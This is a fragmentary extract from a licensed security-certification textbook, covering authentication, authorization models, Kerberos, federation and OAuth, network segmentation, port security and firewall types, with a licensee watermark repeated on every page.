authenticator device, such as a FIDO security key or the TPM in a PC or laptop, to
prove that it is a root of trust. Each security key is manufactured with an attestation
and model ID. During the registration step, if the relying party requires attestation,
the authenticator uses this key to send a report. The relying party can check the
attestation report to verify that the authenticator is a known brand and model and
supports whatever cryptographic properties the relying party demands.
Note that the attestation key is not unique; if it were unique, it would be easy to identify
individuals and be a serious threat to privacy. Instead, it identifies a particular brand
and model.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Authentication
3
6. Apart from cost, what would you consider to be the major considerations
for evaluating a biometric recognition technology?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
7. True or false? When implementing smart card login, the user’s private
key is stored on the smart card.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 4B
Authorization
9
Authorization is the part of identity and access management that governs assigning
privileges to network users and services. Implementing an access control model
helps an organization to manage the implications of privilege assignments and to
account for the actions of both regular and privileged administrative users. Account
policies help you to protect credentials and to detect and manage risks from
compromised accounts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
As a simple classification system is inflexible, most MAC models add the concept of
compartment-based access. For example, a data file might be at Secret classification
and located in the HR compartment. Only subjects with Secret and HR clearance could
access the file.
In MAC, users with high clearance are not permitted to write low-clearance documents.
This is referred to as write up, read down. This prevents, for example, a user with Top
Secret clearance republishing some Top Secret data that they can access with Secret
clearance.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
RBAC can be partially implemented by mapping security groups onto roles, but they
are not identical schemes. Membership in security groups is largely discretionary
(assigned by administrators rather than determined by the system). Also, ideally, a
principal should only inherit the permissions of a role to complete a particular task
rather than retain them permanently. Administrators should be prevented from
escalating their own privileges by assigning roles to their own accounts arbitrarily or
boosting a role’s permissions.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
For example, a user may be granted elevated privileges temporarily. In this case, a
system is needed to ensure that the privileges are revoked at the end of the agreed
period. A system of auditing should regularly review privileges, monitor group
membership, review access control lists for each resource, and identify and disable
unnecessary accounts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Deprovisioning is the process of removing the access rights and permissions allocated
to an employee when they leave the company or from a contractor when a project
finishes. This involves removing the account from any roles or security groups. The
account might be disabled for a period and then deleted or deleted immediately.
Configuring access policies and rights using Group Policy Objects in Windows Server 2016.
(Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Account Restrictions
Policy-based restrictions can be used to mitigate some risks of account compromise
through the theft of credentials.
Location-Based Policies
A user or device can have a logical network location, identified by an IP address,
subnet, virtual LAN (VLAN), or organizational unit (OU). This can be used as an
account restriction mechanism. For example, a user account may be prevented
from logging on locally to servers within a restricted OU.
The geographical location of a user or device can be calculated using a geolocation
mechanism:
• IP address—can be associated with a map location to varying degrees of
accuracy based on information published by the registrant, including name,
country, region, and city. The registrant is usually the Internet service provider
(ISP), so the information you receive will provide an approximate location of a
host based on the ISP. If the ISP is one that serves a large or diverse geographical
area, it is more difficult to pinpoint the location of the host Internet service
providers (ISPs). Software libraries, such as GeoIP, facilitate querying this data.
Time-Based Restrictions
There are four main types of time-based policies:
• A time-of-day restrictions policy establishes authorized login hours for an
account.
• An impossible travel time/risky login policy tracks the location of login events
over time. If these do not meet a threshold, the account will be disabled. For
example, a user logs in to an account from a device in New York City. A couple of
hours later, a login attempt is made from Los Angeles, but is refused and an alert
is raised because it is not feasible for the user to be in both locations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Users with administrative privileges must take the greatest care with credential
management. Privilege-access accounts must use strong passwords and ideally
multifactor authentication (MFA) or passwordless authentication.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Authorization
10
3. What is the process of ensuring accounts are only created for valid
users, only assigned the appropriate privileges, and that the account
credentials are known only to the valid user?
4. What is the policy that states users should be allocated the minimum
sufficient permissions?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 4C
Identity Management
6
While an on-premises network can use a local directory to manage accounts and
rights, as organizations move services to the cloud, these authorizations have to be
implemented using federated identity management solutions.
Windows Authentication
Windows authentication involves a complex architecture of components (docs.
microsoft.com/en-us/windows-server/security/windows-authentication/
credentials-processes-in-windows-authentication), but the following three scenarios
are typical:
• Windows local sign-in—is the Local Security Authority Subsystem Service
(LSASS) that compares the submitted credential to a hash stored in the Security
Accounts Manager (SAM) database, which is part of the registry. This is also
referred to as interactive logon.
• Windows network sign-in—is LSASS which can pass the credentials for
authentication to an Active Directory (AD) domain controller. The preferred
system for network authentication is based on Kerberos, but legacy network
applications might use NT LAN Manager (NTLM) authentication.
• Remote sign-in—is used if the user’s device is not directly connected to the
local network, authentication can take place over a virtual private network
(VPN), enterprise Wi-Fi, or web portal. These use protocols to create a secure
connection between the client machine, the remote access device, and the
authentication server.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Linux Authentication
In Linux, local user account names are stored in /etc/passwd. When a user
logs in to a local interactive shell, the password is checked against a hash stored in
/etc/shadow. Interactive login over a network is typically accomplished using
Secure Shell (SSH). With SSH, the user can be authenticated using cryptographic
keys instead of a password.
A pluggable authentication module (PAM) is a package for enabling different
authentication providers, such as smart-card log-in. The PAM framework can also
be used to implement authentication to network directory services.
Directory Services
A directory service stores information about users, computers, security groups/
roles, and services. Each object in the directory has a number of attributes. The
directory schema describes the types of attributes, what information they contain,
and whether they are required or optional. In order for products from different
vendors to be interoperable, most directory services are based on the Lightweight
Directory Access Protocol (LDAP), which was developed from a standard called
X.500.
Within an X.500-like directory, a distinguished name (DN) is a collection of
attributes that define a unique identifier for any given resource. A distinguished
name is made up of attribute-value pairs, separated by commas. The most specific
attribute is listed first, and successive attributes become progressively broader. This
most specific attribute is the relative distinguished name, as it uniquely identifies
the object within the context of successive (parent) attribute values.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Some of the attributes commonly used include common name (CN), organizational
unit (OU), organization (O), country (C), and domain component (DC).
For example, the distinguished name of a web server operated by Widget in the UK
might be the following:
CN=WIDGETWEB, OU=Marketing, O=Widget, C=UK,
DC=widget, DC=foo
Kerberos can authenticate human users and application services. These are
collectively referred to as principals. Using authentication to a Windows domain
as an example, the first step in Kerberos SSO is to authenticate with a KDC server,
implemented as a domain controller.
1. The principal sends the authentication service (AS) a request for a Ticket
Granting Ticket (TGT). This is composed by encrypting the date and time on
the local computer with the user’s password hash as the key.
The password hash itself is not transmitted over the network. Although we refer to
passwords for simplicity, the system can use other authenticators, such as smart
card login.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
2. The AS checks that the user account is present, that it can decode the request
2.
by matching the user’s password hash with the one in the Active Directory
database, and that the request has not expired. If the request is valid, the AS
responds with the following data:
The TGT is an example of a logical token. All the TGT does is identify who you are
and confirm that you have been authenticated—it does not provide you with access
to any domain resources.
2. The principal sends the TGS a copy of its TGT and the name of the application
server it wishes to access plus an authenticator, consisting of a time-stamped
client ID encrypted using the TGS session key.
The TGS should be able to decrypt both messages using the KDC’s secret key
for the first and the TGS session key for the second. This confirms that the
request is genuine. It also checks that the ticket has not expired and has not
been used before (replay attack).
• A Service session key—is used between the client and the application
server. This is encrypted with the TGS session key.
4. The principal forwards the service ticket, which it cannot decrypt, to the
4.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
5. The application server decrypts the service ticket to obtain the service
5.
session key using its secret key, confirming that the principal has sent it an
untampered message. It then decrypts the authenticator using the service
session key.
6. Optionally, the application server responds to the principal with the time
6.
7. The server now responds to access requests (assuming they conform to the
7.
One of the noted drawbacks of Kerberos is that the KDC represents a single
point-of-failure for the network. In practice, backup KDC servers can be
implemented (for example, Active Directory supports multiple domain controllers,
each of which are running the KDC service).
Federation
Federation is the notion that a network needs to be accessible to more than just
a well-defined group of employees. In business, a company might need to make
parts of its network open to partners, suppliers, and customers. The company
can manage its employee accounts easily enough. Managing accounts for each
supplier or customer internally may be more difficult. Federation means that the
company trusts accounts created and managed by a different network. As another
example, in the consumer world, a user might want to use both Google Workspace
and Twitter. If Google and Twitter establish a federated network for the purpose
of authentication and authorization, then the user can log on to Twitter using their
Google credentials or vice versa.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
2. The principal authenticates with the identity provider and obtains a claim, in
the form of some sort of token or document signed by the IdP.
3. The principal presents the claim to the service provider. The SP can validate
that the IdP has signed the claim because of its trust relationship with the IdP.
4. The service provider can now connect the authenticated principal to its own
accounts database to determine its permissions and other attributes. It may
be able to query attributes of the user account profile held by the IdP, if the
principal has authorized this type of access.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Open Authorization
Many public clouds use application programming interfaces (APIs) based on
Representational State Transfer (REST) rather than SOAP. These are called
RESTful APIs. Where SOAP is a tightly specified protocol, REST is a looser
architectural framework. This allows the service provider more choice over
implementation elements. Compared to SOAP and SAML, there is better support
for mobile apps.
Authentication and authorization for a RESTful API are often implemented using
the Open Authorization (OAuth) protocol. OAuth is designed to facilitate sharing
of information (resources) within a user profile between sites. The user creates a
password-protected account at an identity provider (IdP). The user can link that
identity to an OAuth consumer site without giving the password to the consumer
site. A user (resource owner) can grant an OAuth client authorization to access
some part of their account. A client in this context is an app or consumer site.
The user account is hosted by one or more resource servers. A resource server
is called an API server because it hosts the functions that allow OAuth clients
(consumer sites and mobile apps) to access user attributes. An authorization
server processes authorization requests. A single authorization server can manage
multiple resource servers; equally, the resource and authorization server could be
the same server instance.
The client app or service must be registered with the authorization server. As part
of this process, the client registers a redirect URL, which is the endpoint that will
process authorization tokens. Registration also provides the client with an ID and
a secret. The ID can be publicly exposed, but the secret must be kept confidential
between the client and the authorization server. When the client application
requests authorization, the user approves the authorization server to grant the
request using an appropriate method. OAuth supports several grant types—or
flows—for use in different contexts, such as server to server or mobile app to
server. Depending on the flow type, the client will end up with an access token
validated by the authorization server. The client presents the access token to the
resource server, which then accepts the request for the resource if the token is
valid.
OAuth uses the JavaScript Object Notation (JSON) Wweb Token (JWT) format
for claims data. JWTs can be passed as Base64-encoded strings in URLs and HTTP
headers and can be digitally signed for authentication and integrity.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Identity Management
7
5. You are working on a cloud application that allows users to log on with
social media accounts over the web and from a mobile application.
Which protocols would you consider, and which would you choose as
most suitable?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 4
Summary
6
You should be able to assess the design and use of authentication products in
terms of meeting confidentiality, integrity, and availability requirements. Given
a product-specific setup guide, you should be able to implement protocols and
technologies such as MFA, passwordless authentication, Kerberos SSO, and
federated identity management.
• Ownership factors include smart cards, OTP keys/fobs and security keys, and
OTP authenticator apps installed on a trusted device.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
Managing user authentication and authorization is only one part of building secure
information technology services. The network infrastructure must also be designed
to run services with the properties of confidentiality, integrity, and availability. While
design might not be a direct responsibility for you at this stage in your career, you
should understand the factors that underpin design decisions, so that you can
assist with analysis and planning.
Lesson Objectives
In this lesson, you will do the following:
• Compare and contrast security implicatons of different on-premises network
architecture models.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 5A
Enterprise Network Architecture
2
While you may not be responsible for network design in your current role, it is
important that you understand the vulnerabilities that can arise from weaknesses
in network architecture, and some of the general principles for ensuring a well-
designed network. This will help you to contribute to projects to improve resiliency
and to make recommendations for improvements.
• Network applications are the services that run on the infrastructure to support
business activities, such as processing invoices or sending email.
• Data assets are the information that is created, stored, and transferred as a
result of business activity.
Secure network infrastructure and application architecture are put there to support
secure business workflows. A workflow is a series of tasks that a business needs
to perform, such as accepting customer orders from a web store. Remember that
security means the attributes of confidentiality, integrity, and availability.
Analyzing the systems involved in provisioning email can illustrate the sorts of
architecture decisions that need to be made:
• Access—the client device must access the network via a physical channel and
obtain a logical address. The user must be authenticated and authorized to use
the email application. The corollary is that unauthorized users and devices must
be denied access.
• Email mailbox server—the mailbox stores data assets and must only be
accessed by authorized clients, and conversely, must be fully available and
fault tolerant to support the genuine user. The email service must run with a
minimum number of dependencies over network infrastructure that is resilient
to faults.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
This type of business flow will involve systems with different security requirements.
Placing the client, the mailbox, and the mail transfer server all within the same
segment will introduce many vulnerabilities. Understanding and controlling how
data flows between these network segments is a key part of secure and effective
network architecture design.
Network Infrastructure
It is helpful to use a layer model to analyze network infrastructure and services. The
Open Systems Interconnection (OSI) model is a widely quoted example of how to
define layers of network functions.
A network is comprised of nodes and links. At the physical (PHY) layer, or layer 1 in
the OSI model, links are implemented as twisted-pair cables transmitting electrical
signals, fiber optic cables carrying infrared light signals, or as wireless devices
transmitting radio waves.
There are two types of nodes. A host node is one that initiates data transfers. Hosts
are usually either servers or clients. An intermediary node forwards traffic around the
network. This forwarding occurs at different layers and with different scopes. A network
scope of a single site is referred to as a local area network (LAN). Networks that span
metropolitan, country-wide, or global scopes are called wide area networks (WANs).
Each network node must be identifiable via a unique address. This addressing
function also takes place at different layers with different scopes.
Forwarding and addressing functions are handled by the following network
appliances and protocols:
• Switches forward frames between nodes in a cabled network. The network
adapter in each host is connected to a switch port via a cable. Switches work
at layer 2 of the OSI model. Most LANs use networks based on the Ethernet
standard. An Ethernet switch makes forwarding decisions based on the
hardware or media access control (MAC) address of attached hosts. A MAC
address is a 48-bit value written in hexadecimal notation, such as 00-15-5D-01-
CA-4A. This addressing works within the local network segment only. This is
referred to as a broadcast domain.
Appliances, protocols, and addressing functions within the OSI network layer reference model.
(Images © 123RF.com.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Wireless access points provide a bridge between a cabled network and wireless
hosts, or stations. Access points work at layer 2 of the OSI model. Wireless
devices also use MAC addressing at layer 2.
• Domain Name System (DNS) servers host name records and perform name
resolution to allow applications and users to address hosts and services using
fully qualified domain names (FQDNs) rather than IP addresses. DNS also works
at layer 7 of the OSI model, but is an infrastructure service, rather than a user-
level service, like web browsing.
The OSI model has three upper layers. In practical terms, distinguishing the functions of
layers 5, 6, and 7 isn't that helpful, so just think of applications working at layer 7.
• Structured cabling is run from each wall port through wall and ceiling conduits or
voids to a patch panel.
• Another patch cable connects the port on the patch panel port to a switch port.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
This can be described as a star topology. The switch sits at the center with links
to hosts radiating out. The switch can establish data links between any two hosts
that are attached to it. Also, if a host sends a broadcast to all local nodes, the
switch ensures that it is received by all the connected hosts. This is referred to as a
broadcast domain. The hosts are all part of the same layer 2 local network segment.
This basic star topology exhibits a number of issues. Broadcast domains with
hundreds of hosts suffer performance penalties. The network segment is also “flat”
in terms of security. Any host can communicate freely with any other host in the
same segment.
These drawbacks mean that large networks use a hierarchical design with two or
three forwarding layers. In the hierarchical design, there are a number of blocks
served by access switches. Each access block is a star topology for a group or block
of network hosts served by an access switch. The access switches are connected
by routers. These routers create separate broadcast domains and can control the
flow of traffic between blocks. As each block can have different access policies, this
topology allows the creation of a zone-based security model.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Network with a basic hiearchical structure. Access switches implement blocks of hosts with similar
security properties, such as printers, workstations, servers, and guest devices. Communications
within a block uses MAC addressing and the forwarding function of the access switch.
Communications between these blocks must flow through routers in a core layer and
uses IP addressing.
You will often see the term "layer 3 switch". These are appliances that implement the
core network. They perform a combination of routing and switching. There are many
types of switches with different roles to play in on-premises and datacenter network
architectures.
While client workstations connect to network switches via wall ports and patch panels,
servers and core networking appliances are usually installed to a separate, secure area,
referred to as an equipment room or server room. Server computers can be connected
directly to switch ports using patch cables.
Internet Protocol
Internet Protocol (IP) provides the addressing mechanism for logical networks and
subnets. A 32-bit IP version 4 (IPv4) address is written in dotted decimal notation,
with either a network prefix or subnet mask to divide the address into network
ID and host ID portions. For example, in the IP address 10.1.1.0/24, the /24 prefix
indicates that the first three-quarters of the address (10.1.0.x) is the network ID,
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
while the remainder uniquely identifies a host on that network. This /24 prefix can
also be written as a subnet mask in the form 255.255.255.0.
In the hierarchical network architecture, each access block can be designated as a
separate IP subnet. This system of layer 3 logical addressing makes it easier to write
access control rules for what traffic is allowed to flow between blocks or zones.
Each access block has been allocated a subnet. The guest network is logically separate
from the enterprise LAN and uses a completely different IP network.
Networks can also use 128-bit IPv6 addressing. IPv6 addresses are written using hex
notation in the general format: 2001:db8::abc:0:def0:1234. In IPv6, the last 64-bits
are fixed as the host’s interface ID. The first 64-bits contain network information in
a set hierarchy. For example, an ISP’s routers can use the first 48-bits to determine
where the network is hosted on the global Internet. Within that network, the site
administrator can use the 16-bits remaining (out of 64) to divide the local network
into subnets.
A packet that is sent via IP has to be forwarded using layer 2 addressing. IPv4 uses the
Address Resolution Protocol (ARP) to map a host's IP interface to a MAC address. IPv6
uses the Neighbor Discovery (ND) protocol for the same purpose.
Virtual LANs
Mapping the logical IP topology to physical hardware switches is not always
straightforward. This problem is addressed by the virtual LAN (VLAN) feature
supported by most switches. All switches connected together on the same on-
premises network can be configured with a consistent set of VLAN IDs. A VLAN ID
is a value from 2 to 4,094. Any given switch port can be assigned to a specific VLAN,
regardless of the physical location of the switch. Different ports on the same switch
can be assigned to different VLANs.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Each VLAN is a separate broadcast domain. Any traffic sent from one VLAN to
another must be routed. This means that the segmentation enforced by VLANs
at layer 2 can be mapped to logical divisions defined by IP subnets at layer 3.
Configuring VLANs allows segmentation of hosts attached to the same switch. Each VLAN has a
separate subnet. Traffic between hosts in different VLANs must go via the router or layer 3 switch.
In the diagram above, the access block for client devices uses two VLANs to
segment workstation computer hosts (VLAN32) from Voice over Internet Protocol
(VoIP) handsets (VLAN40). The VLANs map to two subnets: 10.1.32.0/24 and
10.1.40.0/24.
A VoIP handset with IP address 10.1.40.100 would need to use a router to contact a
computer host with IP 10.1.32.100. The two hosts might be connected to the same
switch, but the VLAN configuration prevents them from communicating with one
another directly. Additionally, an access control rule configured on the router could
prevent this type of communication if it were deemed a risk to security.
The VLAN topology can be extended across multiple switches. Consider the scenario
where the office expands to a second floor, which requires an additional switch
appliance to provision sufficient ports. The same VLAN IDs and subnets could be
configured for floor two, making devices on the two floors part of the same two
workstation and VoIP segments.
Security Zones
The network architecture features that create segments mapped to subnets allow
the creation of a zone-based security topology. On-premises networks have a clear
organizational boundary at the network perimeter. Hosts outside the perimeter are
in a public Internet zone and are untrusted. Hosts within the perimeter will have
different levels of trust and access control requirements.
To map out the internal security topology, analyze the systems and data assets that
support workflows and identify ones that have similar access control requirements:
• Database and file systems that host company data and personal data should
prioritize confidentiality and integrity. Data should not usually be held within a
single zone, however. Think about the impact when a zone is compromised.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
If a single zone stores all types of data assets, the impact will be extremely high.
Separating different kinds of information into different zones will reduce the
breach’s impact.
• Client devices need to prioritize integrity and availability. These devices should
not store data and therefore have a lower confidentiality requirement.
• Public-facing application servers (web, email, remote access, and so on) should
also prioritize integrity and availability. They should not store sensitive data, such
as account credentials. Publicly accessible servers must not be considered fully
trusted.
This analysis will generate a list of the security zones needed. The network
architecture and security control infrastructure must ensure that these zones
are segregated from one another by physical and/or logical segmentation. Traffic
between zones should be strictly controlled using a security device, typically a
firewall. Traffic policies should apply the principle of least privilege.
Hosts are trusted in the sense that they are under administrative control and subject to
the security mechanisms (antivirus software, user rights, software updating, and so on)
that have been set up to defend the network.
A zone must have a known entry and exit point. For example, if the only authorized
access point for a zone is a router, placing a wireless access point within the zone would
be a security violation.
Network diagram showing security zone privilege levels and simplified access rules.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The diagram illustrates how traffic between hosts in zones with different privilege
sensitivities can be subject to access controls:
1. A low privilege zone containing hosts that are difficult to secure and patch,
such as printers, can accept connections but cannot initiate requests to any
other hosts.
3. Hosts in a guest zone can access the Internet, but are not allowed to access
the enterprise LAN.
4. Public-facing servers can accept requests from the Internet but cannot initiate
requests to the enterprise LAN or to the Internet.
5. Where hosts are separated by VLANs within the same zone additional access
rules can be configured. For example, app servers should be able to make
requests from databases, but not vice versa.
Attack Surface
The network attack surface is all the points at which a threat actor could gain
access to hosts and services. It is helpful to use the layer model to analyze the
potential attack surface:
• Layer 1/2—allows unauthorized hosts to connect to wall ports or wireless
networks and communicate with hosts within the same broadcast domain.
Additionally, you should consider the external/public attack surface separately from
the internal/private attack surface.
Each layer requires its own type of security controls to prevent, detect, and correct
attacks. Provisioning multiple control categories and functions to enforce multiple
layers of protection is referred to as defense in depth. Security controls deployed
to the network perimeter are designed to prevent external hosts from launching
attacks at any network layer. The division of the private network into segregated
zones is designed to mitigate risks from internal hosts that have either been
compromised or that have been connected without authorization.
Weaknesses in the network architecture make it more susceptible to undetected
intrusions or to catastrophic service failures. Typical weaknesses include the
following:
• Single points of failure—a “pinch point” relying on a single hardware server or
appliance or network channel.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Port Security
Each wall port and switch port represents an opportunity for a threat actor to attach
a device to the network. A threat actor who can operate a host with physical access
to a network segment can launch a variety of attacks.
Access to the physical switch ports and switch hardware should be restricted
to authorized staff. To accomplish this place the switch appliances in secure
server rooms and/or lockable hardware cabinets. To prevent the attachment of
unauthorized client devices at unsecured wall ports, the switch port that the wall
port cabling connects to can be administratively disabled, or the patch cable can be
physically removed from the switch port. Completely disabling ports in this way can
introduce a lot of administrative overhead and allow room for error. Also, it doesn’t
provide complete protection, as an attacker could unplug a device from an enabled
port and connect their own machine. Consequently, more sophisticated methods of
ensuring port security have been developed.
Configuring ARP inspection on a Cisco switch. (Courtesy of Cisco Systems, Inc. Unauthorized
use not permitted.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
When a host connects to an 802.1X-enabled switch port, the switch opens the
port for the EAP over LAN (EAPoL) protocol only. The switch port only allows full
data access when the host has been authenticated. The switch receives an EAP
packet with the supplicant’s credentials. These are encrypted and cannot be read
by the switch. The switch uses the RADIUS protocol to send the EAP packet to the
authentication server. The authentication server can access the directory of user
accounts and can validate the credential. If authentication is successful, it informs
the switch that full network access can be granted.
IEEE 802.1X Port-based Network Access Control with RADIUS and EAP authentication.
(Images © 123RF.com.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Physical Isolation
Some hosts are so security-critical that it is unsafe to connect them to any type of
network. One example is the root certification authority in PKI. Another example is
a host used to analyze malware execution. A host that is not physically connected to
any network is said to be air-gapped.
It is also possible to configure an air-gapped network. This means that hosts within
the air-gapped network can communicate, but there is no cabled or wireless
connection to any other network. Military bases, government sites, and industrial
facilities use air-gapped networks.
Physically isolating a host or group of hosts improves security but also incurs
significant management challenges. Device administration has to be performed at
a local terminal. Any updates or installs have to be performed using USB or optical
media. This media is a potential attack vector and must be scanned before allowing
its use on an air-gapped host.
Architecture Considerations
When evaluating the use of a particular architecture and selecting effective controls,
consider a number of factors:
• Costs—like architecture changes and the acquisition and upgrade of appliances
and software require an up-front capital outlay, which can depreciate and lose
value. There are also ongoing maintenance and support liabilities. The value of
the investment in security architecture and controls can be calculated based on
how much they reduce losses from incidents.
• Resilience and ease of recovery—reduce the time to recover from a failure. For
example, a system that recovers from a failure without manual intervention is
more resilient than one that requires an administrator to restart it.
• Power—is a feature that ensures the facility can meet the energy demands of
its devices and workloads. Power usage through higher compute resources
increases costs. Ensuring that the building infrastructure minimizes power
failures improves availability.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Risk transference—is a contract that uses a third party to manage the network
infrastructure. A service-level agreement (SLA) can be defined with penalties
if metrics for responsiveness, scalability, availability, and resilience are not
maintained.
On-premises networks tend to have high capital costs and low scalability. For
example, consider the difficulty of increasing bandwidth from 1 Gbps to 10 Gbps
operation across the entire site. This would likely require the installation of new
cable throughout the building. Recovery procedures can be complex if the site
premises is affected by a large-scale disaster. This means that availability and
resilience can be lower than alternative solutions such as cloud networking.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Enterprise Network Architecture
3
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 5B
Network Security Appliances
6
Device Placement
The selection of effective controls for network infrastructure is the process of
choosing the type and placement of security appliances and software. The aim
is to enforce segmentation, apply access controls, and monitor traffic for policy
violations.
The selection of effective controls is governed by the principle of defense in depth.
Defense in depth means that security-critical zones are protected by diverse
preventive, detective, and corrective controls operating at each layer of the OSI
model. Defense in depth is ensured through careful selection of device placement
within the network topology. There are three options:
• Preventive controls—are often placed at the border of a network segment or
zone. Preventive controls such as firewalls enforce security policies on traffic
entering and exiting the segment, ensuring confidentiality and integrity. A load
balancer control ensures high availability for access to the zone.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
As an illustration, the diagram shows how different control types can be positioned
within the network to ensure defense in depth:
1. At the network border, a preventive control such as a firewall enforces access
rules for ingress and egress traffic.
2. A sensor placed inline behind the border firewall relays traffic to an intrusion
detection system to implement detective control and identify malicious traffic
that has evaded the firewall.
3. Access control lists configured on internal routers enforce rules for traffic
being forwarded between internal zones and hosts.
5. Sensors attached to mirrored switch ports enable intrusion detection for the
most sensitive privilege level hosts or zones.
Device Attributes
Attributes determine the precise way in which a device can be placed within the
network topology.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Test access point (TAP)—this is a box with ports for incoming and outgoing
network cabling and an inductor or optical splitter that physically copies the
signal from the cabling to a monitor port. There are types for copper and
fiber optic cabling. Unlike a SPAN, no logic decisions are made so the monitor
port receives every frame—corrupt or malformed or not—and the copying is
unaffected by load.
A TAP device is placed inline with the cable path, while a mirror port uses the switch to copy
frames to a detection system. The router/firewall is an active control as client devices must be
configured to use it for Internet access. The TAP and mirror ports are passive controls. The are
completely transparent to the server and client hosts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Fail-closed means that access is blocked or that the system enters the most
secure state available, given whatever failure occurred. This mode prioritizes
confidentiality and integrity over availability. The risk of a fail-closed control is
system downtime.
It may or may not be possible to configure the fail mode. For example, an inline
security appliance that suffers power failure will fail-closed unless there is an
alternative network path. Some devices designed to be installed inline have a
backup cable path that will allow a fail-open operation.
Firewalls
A firewall is a preventive control designed to enforce policies on traffic entering and
exiting a network zone.
Packet Filtering
A packet filtering firewall is configured by specifying a group of rules called an
access control list (ACL). Each rule defines a specific type of data packet and the
action to take when a packet matches the rule. A packet filtering firewall can inspect
the headers of IP packets. Rules are based on the information found in those
headers:
• IP filtering—accepts or denies traffic based on bits source and/or destination IP
address. Most firewalls can filter by MAC addresses.
If the action is configured to accept or permit, the firewall allows the packet to pass.
A drop or deny action silently discards the packet. A reject action blocks the packet
but responds to the sender with an ICMP message, such as “port unreachable”.
Separate ACLs filter inbound and outbound traffic. Controlling outbound traffic can
block applications not authorized to run on the network and defeat malware such
as backdoors.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Bridged (layer 2)—the firewall inspects traffic passing between two nodes,
such as a router and a switch. It bridges the Ethernet interfaces between the
two nodes, working like a switch. Despite performing forwarding at layer 2, the
firewall can still inspect and filter traffic on the basis of the full range of packet
headers. The firewall’s interfaces are configured with MAC addresses, but not IP
addresses.
• Inline (layer 1)—the firewall acts as a cable segment. The two interfaces don’t
have MAC or IP addresses. Traffic received on one interface is either blocked
or forwarded over the other interface. This is also referred to as virtual wire or
bump-in-the-wire.
Both bridged and inline firewall modes can be referred to as transparent modes.
The typical use case for a transparent mode is to deploy a firewall without having
to reconfigure subnets and reassign IP addresses on other devices. For example,
you could deploy a transparent firewall in front of a web server host without having
to change the host’s IP address. Alernatively, this type of firewall could be placed
between a router and a switch.
Status dashboard for the OPNsense open-source security platform. (Screenshot courtesy
of OPNsense.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Layer 4 Firewall
Layer 4 is the OSI transport layer. A layer 4 firewall examines the TCP three-way
handshake to distinguish new from established connections. A legitimate TCP
connection should follow a SYN > SYN/ACK > ACK sequence to establish a session,
which is then tracked using sequence numbers. Deviations from this, such as SYN
without ACK or sequence number anomalies, can be dropped as malicious flooding
or session hijacking attempts. The firewall can be configured to respond to such
attacks by blocking source IP addresses and throttling sessions. It can also track
UDP traffic, though this is harder as UDP is a protocol without connections. It is also
likely to be able to detect IP header and ICMP anomalies.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Layer 7 Firewall
A layer 7 firewall can inspect the headers and payload of application-layer packets.
One key feature is to verify the application protocol matches the port because
malware can try to send raw TCP data over port 80 just because port 80 is open, for
